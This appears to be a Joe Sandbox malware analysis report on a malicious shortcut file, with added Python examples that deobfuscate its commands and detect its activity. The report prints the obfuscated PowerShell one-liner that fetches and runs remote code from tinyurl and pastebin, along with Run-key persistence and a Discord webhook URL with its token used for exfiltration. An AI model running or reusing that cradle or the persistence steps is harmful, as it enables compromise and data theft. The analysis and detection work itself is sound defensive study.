
Windows Analysis Report
BeginSync lnk.lnk

Overview

General Information

Sample name: BeginSync lnk.lnk
Analysis ID: 1534106
MD5: d817cae04c295bad04c61c96556f3c0c
SHA1: 554e536e859e078948acc128edb40c889f36c57d
SHA256: a30f3084067e8eb1d503d04281aa27c1088298a3256a5aadf16cfa3ca8f68261
Tags: lnk, Neth3N, user-JAMESWT_MHT

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Machine Learning detection for sample
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Connects to a URL shortener service
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • forfiles.exe (PID: 7196 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7416 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7756 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • attrib.exe (PID: 760 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • forfiles.exe (PID: 1120 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 6972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3688 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 2040 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 3108 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3784 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5024 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
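The command line in the tree above is short but deliberately misleading, so a worked deobfuscation helps. `forfiles /p c:\windows\system32 /m notepad.exe /c "<command>"` runs the quoted command once for every file matching the mask; notepad.exe always exists in System32, so the payload runs exactly once, and its parent is forfiles.exe rather than the process that opened the shortcut. Inside it, `sal` is the built-in alias of Set-Alias: `sal callit iEx` makes `callit` mean Invoke-Expression, and `sal $env:os iWr` creates an alias whose name is the value of `$env:OS`, which is the literal string `Windows_NT` on every NT-family Windows, for Invoke-WebRequest. `calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)` therefore reads `Invoke-Expression (Invoke-WebRequest tinyurl.com/yeykydun -UseBasicParsing)`: fetch the next stage and evaluate it in memory. The `fatbake` alias for `calc` is unused noise. The Python below is an added example, not part of the Joe Sandbox report or of the sample; it resolves Set-Alias chains in a one-liner so the cradle can be matched on resolved cmdlet names instead of the attacker's labels. The built-in alias subset and the `$env:OS` value are assumptions stated in the code, and statement splitting on `;` ignores quoting.

```python
import re

# Assumed subset of Windows PowerShell built-in aliases relevant to download cradles.
BUILTIN_ALIASES = {
    "iex": "Invoke-Expression",
    "iwr": "Invoke-WebRequest",
    "irm": "Invoke-RestMethod",
    "sal": "Set-Alias",
}

# Environment variables the sample relies on. $env:OS is "Windows_NT" on any
# NT-family Windows (assumption stated here; it is what makes the alias
# literally named WINDOWS_NT resolve at run time). Alias lookup is case-insensitive.
ENV = {"os": "Windows_NT"}

_ENV_RE = re.compile(r"\$env:([A-Za-z_]\w*)", re.IGNORECASE)
_SAL_RE = re.compile(r"^\s*(?:sal|set-alias)\s+(\S+)\s+(\S+)\s*$", re.IGNORECASE)
_TOKEN_RE = re.compile(r"[A-Za-z_][\w-]*")


def expand_env(cmd):
    """Replace $env:NAME with its assumed value; unknown names are left untouched."""
    return _ENV_RE.sub(lambda m: ENV.get(m.group(1).lower(), m.group(0)), cmd)


def deobfuscate(cmd):
    """Resolve Set-Alias chains and return (normalised command, alias map).

    Splitting on ';' is naive and does not honour quoted strings; good enough
    for one-liners of the kind seen in this report.
    """
    aliases = {}
    kept = []
    for stmt in expand_env(cmd).split(";"):
        m = _SAL_RE.match(stmt)
        if m:
            name, target = m.group(1), m.group(2)
            key = target.lower()
            # Follow chains: "sal a iex; sal b a" makes b -> Invoke-Expression.
            aliases[name.lower()] = aliases.get(key) or BUILTIN_ALIASES.get(key, target)
            continue
        if stmt.strip():
            kept.append(stmt)

    def swap(m):
        key = m.group(0).lower()
        return aliases.get(key) or BUILTIN_ALIASES.get(key, m.group(0))

    normalised = "; ".join(_TOKEN_RE.sub(swap, s).strip() for s in kept)
    return normalised, aliases


def is_download_cradle(cmd):
    """True when the resolved command fetches content and evaluates it."""
    norm = deobfuscate(cmd)[0].lower()
    fetches = any(k in norm for k in ("invoke-webrequest", "invoke-restmethod", "downloadstring"))
    return "invoke-expression" in norm and fetches


# The inner PowerShell command from this report's process tree.
SAMPLE = ("sal fatbake calc;sal callit iEx; sal $env:os iWr; "
          "calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)")

if __name__ == "__main__":
    norm, amap = deobfuscate(SAMPLE)
    print(amap)
    print(norm)
    print("download cradle:", is_download_cradle(SAMPLE))
```

Feed `deobfuscate()` the `-command` argument from a process-creation event and match on the normalised string; Sigma-style substring rules keyed on `iex` or `Invoke-Expression` would otherwise miss this sample entirely, since neither token appears in the original command line.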
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 7756 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0x17bf91:$b1: ::WriteAllBytes(
  • 0x18b675:$b1: ::WriteAllBytes(
  • 0x21c727:$b1: ::WriteAllBytes(
  • 0x50c43:$s1: -join
  • 0x541e5:$s1: -join
  • 0x875d3:$s1: -join
  • 0x87790:$s1: -join
  • 0xa276a:$s1: -join
  • 0xa2eca:$s1: -join
  • 0xe5f45:$s1: -join
  • 0xf301a:$s1: -join
  • 0xf63ec:$s1: -join
  • 0xf6a9e:$s1: -join
  • 0xf858f:$s1: -join
  • 0xfa795:$s1: -join
  • 0xfafbc:$s1: -join
  • 0xfb82c:$s1: -join
  • 0xfbf67:$s1: -join
  • 0xfbf99:$s1: -join
  • 0xfbfe1:$s1: -join
  • 0xfc000:$s1: -join
Process Memory Space: powershell.exe PID: 2040 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0x12c0ed:$b1: ::WriteAllBytes(
  • 0x198521:$b1: ::WriteAllBytes(
  • 0x852fc:$s1: -join
  • 0x85a5c:$s1: -join
  • 0x14c28a:$s1: -join
  • 0x14ef60:$s1: -join
  • 0x147bf:$s3: reverse
  • 0x1b3f3:$s3: reverse
  • 0x1d464:$s3: reverse
  • 0x28493:$s3: reverse
  • 0x110a8d:$s3: reverse
  • 0x110d7b:$s3: reverse
  • 0x111495:$s3: reverse
  • 0x111c4e:$s3: reverse
  • 0x118e3c:$s3: reverse
  • 0x119256:$s3: reverse
  • 0x119dde:$s3: reverse
  • 0x11aa8b:$s3: reverse
  • 0x167cfe:$s3: reverse
  • 0x17234f:$s3: reverse
  • 0x17d7c3:$s3: reverse
Process Memory Space: powershell.exe PID: 5024 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0x671cd:$b1: ::WriteAllBytes(
  • 0x4bdd5:$s1: -join
  • 0x4c535:$s1: -join
  • 0x923f5:$s1: -join
  • 0xa35cc:$s1: -join
  • 0x1d1c9:$s3: reverse
  • 0x28acd:$s3: reverse
  • 0xe494b:$s3: reverse
  • 0xeb57f:$s3: reverse
  • 0xed60c:$s3: reverse
  • 0xf863b:$s3: reverse
  • 0x13978f:$s3: reverse
  • 0x141db0:$s3: reverse
  • 0x4bdb7:$s4: +=
  • 0x4c1d2:$s4: +=
  • 0x4c449:$s4: +=
  • 0x4c517:$s4: +=
  • 0x4d93f:$s4: +=
  • 0x4d9e1:$s4: +=
  • 0x510bb:$s4: +=
  • 0x523e5:$s4: +=
Source | Rule | Description | Author | Strings
amsi64_7756.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0xd1f5:$b1: ::WriteAllBytes(
  • 0xb8fa:$s1: -join
  • 0x50a6:$s4: +=
  • 0x5168:$s4: +=
  • 0x938f:$s4: +=
  • 0xb4ac:$s4: +=
  • 0xb796:$s4: +=
  • 0xb8dc:$s4: +=
  • 0xf91f:$s4: +=
  • 0xf99f:$s4: +=
  • 0xfa65:$s4: +=
  • 0xfae5:$s4: +=
  • 0xfcbb:$s4: +=
  • 0xfd3f:$s4: +=
  • 0xd28f:$e4: Get-WmiObject
  • 0xd331:$e4: Get-WmiObject
  • 0xde08:$e4: Get-WmiObject
  • 0xdff7:$e4: Get-Process
  • 0xe04f:$e4: Start-Process
amsi64_2040.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process
amsi64_5024.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)', CommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)'", ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 7196, ParentProcessName: forfiles.exe, ProcessCommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)', ProcessId: 7416, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7756, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)', CommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)'", ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 7196, ParentProcessName: forfiles.exe, ProcessCommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)', ProcessId: 7416, ProcessName: powershell.exe
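The Sigma matches above each cover a single event: a suspicious PowerShell parameter substring on the process start, and a value written under HKCU\...\CurrentVersion\Run. The attrib.exe call in the process tree adds a third signal that only shows up by correlation: the file the Run value points at is marked system+hidden right after it is registered. The Python below is an added example, not part of the report; it evaluates those rules together over a few constructed Sysmon-style process and registry events built from the values on this page. The field names, the explorer.exe parent of forfiles.exe, the benign control entry and the event order (Run value written before attrib.exe runs) are assumptions; a real pipeline would read Sysmon event IDs 1 and 13.

```python
import re

# Constructed Sysmon-style events (assumed field names) built from this report.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
FORFILES = r"C:\Windows\System32\forfiles.exe"
LNK = r"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
FORFILES_CMD = (r'"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c '
                '"powershell.exe -command powershell -windowstyle h -command '
                "'sal fatbake calc;sal callit iEx; sal $env:os iWr; "
                "calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)'\"")
PS_CMD = ("-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; "
          "sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)'")

EVENTS = [
    {"type": "process", "pid": 7196, "image": FORFILES,
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": FORFILES_CMD},  # parent assumed
    {"type": "process", "pid": 7416, "image": PS,
     "parent_image": FORFILES, "cmdline": PS_CMD},
    {"type": "registry", "pid": 7756, "image": PS, "event": "SetValue",
     "target": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync",
     "details": LNK},
    {"type": "process", "pid": 760, "image": r"C:\Windows\system32\attrib.exe",
     "parent_image": PS, "cmdline": r'"C:\Windows\system32\attrib.exe" +s +h "' + LNK + '"'},
    # Benign control (constructed): a conventional Run entry pointing at an installed EXE.
    {"type": "registry", "pid": 4321, "image": r"C:\Program Files\Vendor\Setup.exe",
     "event": "SetValue",
     "target": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Vendor Updater",
     "details": r"C:\Program Files\Vendor\Updater.exe"},
]

RUN_KEY_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\\", re.IGNORECASE)
ENV_ALIAS_RE = re.compile(r"\b(sal|set-alias)\s+\$env:")
FORFILES_C_RE = re.compile(r"\s/c\s")
QUOTED_PATH_RE = re.compile(r'"([^"]+)"')
SCRIPT_EXT = (".lnk", ".vbs", ".js", ".jse", ".wsf", ".ps1", ".hta", ".bat", ".cmd")
USER_WRITABLE = ("\\programdata\\", "\\appdata\\", "\\temp\\", "\\users\\public\\")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(events):
    """Return (rule, pid) alerts; Run-value targets are remembered so a later
    attrib.exe +s +h on the same path can be tied back to the persistence."""
    alerts = []
    autostart_paths = set()
    for ev in events:
        if ev["type"] == "process":
            img = basename(ev["image"])
            parent = basename(ev.get("parent_image", ""))
            cmd = ev["cmdline"]
            low = cmd.lower()
            if img == "forfiles.exe" and FORFILES_C_RE.search(low):
                alerts.append(("forfiles_command_execution", ev["pid"]))
            if img == "powershell.exe" and parent == "forfiles.exe":
                alerts.append(("powershell_spawned_by_forfiles", ev["pid"]))
            if img == "powershell.exe" and ENV_ALIAS_RE.search(low):
                alerts.append(("powershell_env_alias_obfuscation", ev["pid"]))
            if img == "attrib.exe" and "+h" in low and "+s" in low:
                for path in QUOTED_PATH_RE.findall(cmd):
                    if path.lower() in autostart_paths:
                        alerts.append(("autostart_entry_hidden_by_attrib", ev["pid"]))
        elif ev["type"] == "registry" and ev["event"] == "SetValue":
            if RUN_KEY_RE.search(ev["target"]):
                data = ev["details"].strip('"').lower()
                autostart_paths.add(data)
                if data.endswith(SCRIPT_EXT) or any(d in data for d in USER_WRITABLE):
                    alerts.append(("run_key_points_to_script_or_user_writable", ev["pid"]))
    return alerts


if __name__ == "__main__":
    for rule, pid in evaluate(EVENTS):
        print(f"{rule:45s} pid={pid}")
```

The control entry shows the intended precision: a Run value pointing at an executable under Program Files produces nothing, while a .lnk under ProgramData fires on its own and again when attrib.exe hides it.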
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-15T15:53:52.186365+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.10 | 49711 | 162.159.137.232 | 443 | TCP
2024-10-15T15:54:08.179140+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.10 | 49720 | 162.159.137.232 | 443 | TCP
2024-10-15T15:54:16.372817+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.10 | 49722 | 162.159.137.232 | 443 | TCP


AV Detection

Source: Submitted Sample | Integrated Neural Analysis Model: Matched 97.7% probability
Source: BeginSync lnk.lnk | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49702 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.10:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.10:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.10:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.10:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.10:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.10:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.10:49722 version: TLS 1.2

Networking

Source: Network traffic | Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.10:49711 -> 162.159.137.232:443
Source: Network traffic | Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.10:49722 -> 162.159.137.232:443
Source: Network traffic | Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.10:49720 -> 162.159.137.232:443
Source: unknown | DNS query: name: pastebin.com (2 occurrences)
Source: unknown | DNS query: name: tinyurl.com (2 occurrences)
Source: Joe Sandbox View | IP Address: 104.20.3.235 (2 occurrences)
Source: Joe Sandbox View | IP Address: 162.159.137.232
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS (2 occurrences)
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected (10 occurrences): GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected (12 occurrences): GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected (3 occurrences): POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 294 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected (2 occurrences): GET /yeykydun HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: tinyurl.com | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (5 occurrences)
Source: global traffic | DNS traffic detected: DNS query: tinyurl.com
Source: global traffic | DNS traffic detected: DNS query: pastebin.com
Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic | DNS traffic detected: DNS query: discord.com
Source: unknown | HTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 294 | Connection: Keep-Alive
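Every request above carries the same User-Agent, `Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682`. The report files this under "uses a known web browser user agent", but the string is the default Invoke-WebRequest user agent of Windows PowerShell 5.1 and no browser sends it; on a proxy or egress log it is itself a strong key, and paired with a paste-site raw fetch, a URL shortener, a raw GitHub file or a Discord webhook POST it describes this stager almost completely. The Python below is an added example, not part of the report; it parses request heads constructed from the four distinct requests listed above (the POST body is not on the page and is omitted) and scores each one. The shortener and raw-code host lists are assumptions to be extended from local data.

```python
import re

POWERSHELL_UA_RE = re.compile(r"\bWindowsPowerShell/(\d+\.\d+)")
WEBHOOK_RE = re.compile(r"^/api/webhooks/(\d+)/")
# Assumed host lists; extend from your own proxy logs.
PASTE_RAW_PREFIXES = {"pastebin.com": "/raw/"}
SHORTENER_HOSTS = {"tinyurl.com", "bit.ly", "is.gd", "t.ly"}
RAW_CODE_HOSTS = {"raw.githubusercontent.com", "gist.githubusercontent.com"}

PS_UA = "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682"


def request(method, path, host, extra_headers="", ua=PS_UA):
    """Build a constructed request head in wire format (headers only, no body)."""
    return (f"{method} {path} HTTP/1.1\r\nUser-Agent: {ua}\r\n{extra_headers}"
            f"Host: {host}\r\nConnection: Keep-Alive\r\n\r\n")


# Constructed from the four distinct requests in this report.
SAMPLE_REQUESTS = [
    request("GET", "/yeykydun", "tinyurl.com"),
    request("GET", "/raw/sA04Mwk2", "pastebin.com"),
    request("GET", "/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt",
            "raw.githubusercontent.com"),
    request("POST", "/api/webhooks/1285453590428782614/"
            "2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2",
            "discord.com", "Content-Type: application/json\r\nContent-Length: 294\r\n"),
]


def parse_request(raw):
    """Split a request head into method, path and a lower-cased header dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def classify(req):
    """Return the list of indicators a single request matches."""
    findings = []
    host = req["headers"].get("host", "").lower()
    ua = req["headers"].get("user-agent", "")
    path = req["path"]
    if POWERSHELL_UA_RE.search(ua):
        findings.append("powershell_user_agent")
    if host in PASTE_RAW_PREFIXES and path.startswith(PASTE_RAW_PREFIXES[host]):
        findings.append("paste_site_raw_fetch")
    if host in SHORTENER_HOSTS:
        findings.append("url_shortener_fetch")
    if host in RAW_CODE_HOSTS:
        findings.append("raw_code_host_fetch")
    m = WEBHOOK_RE.match(path)
    if host == "discord.com" and m and req["method"] == "POST":
        # The webhook ID is the stable part to block; the token after it rotates.
        findings.append("discord_webhook_post:" + m.group(1))
    return findings


def risk(findings):
    """Scripted client plus an exfil channel is high; scripted plus any other hit is medium."""
    scripted = "powershell_user_agent" in findings
    others = [f for f in findings if f != "powershell_user_agent"]
    if scripted and any(f.startswith("discord_webhook_post") for f in others):
        return "high"
    if scripted and others:
        return "medium"
    return "low"


def triage(raw):
    findings = classify(parse_request(raw))
    return {"findings": findings, "risk": risk(findings)}


if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        print(triage(raw))
```

A browser fetching the same raw GitHub path scores low, because the user agent alone carries the weight; that is also why the sample's choice to leave the default PowerShell user agent in place is the most reliable thing to alert on here.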
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB62B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F9E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4C83000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://discord.com
